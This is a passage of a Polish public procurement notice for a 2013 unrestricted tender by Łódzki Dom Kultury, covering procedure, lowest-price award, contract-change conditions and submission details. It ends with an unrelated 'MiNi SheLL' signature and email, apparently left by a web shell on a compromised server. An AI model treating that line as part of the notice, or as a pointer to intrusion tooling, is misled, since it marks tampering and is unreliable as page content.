b) w przypadku zamówień na usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w punkcie a)
c) w postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie Rozporządzenia Prezesa Rady Ministrów w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane z dnia 19 lutego 2013 roku (tj. od dnia 20 lutego 2013 roku), wykonawca , w miejsce poświadczeń, o których mowa w pkt a) może przedkładać dokumenty potwierdzające należyte wykonanie usług, określone w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 roku w sprawie dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do przepisu art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwości zmiany umowy w sprawie niniejszego zamówienia publicznego, w przypadku:
1) wprowadzenia przez ustawodawcę zmiany przepisów podatkowych, które spowodują zmianę stawki podatku od towarów i usług (VAT). W takim przypadku nowa stawka podatku VAT zostanie naliczona od chwili wejścia w życie tych zmian;
2) wynagrodzenia umownego, pod warunkiem, że zmiana ta jest korzystna dla Zamawiającego;
3) konieczności wprowadzenia postanowień umownych tylko w uzasadnionych przypadkach, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ldk.lodz.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Łódzki Dom Kultury
ul. Traugutta 18
90-113 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2013 godzina 09:30, miejsce: Łódzki Dom Kultury
ul. Traugutta 18
90-113 Łódź
pokój nr 218 (Sekretariat Dyrektora).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com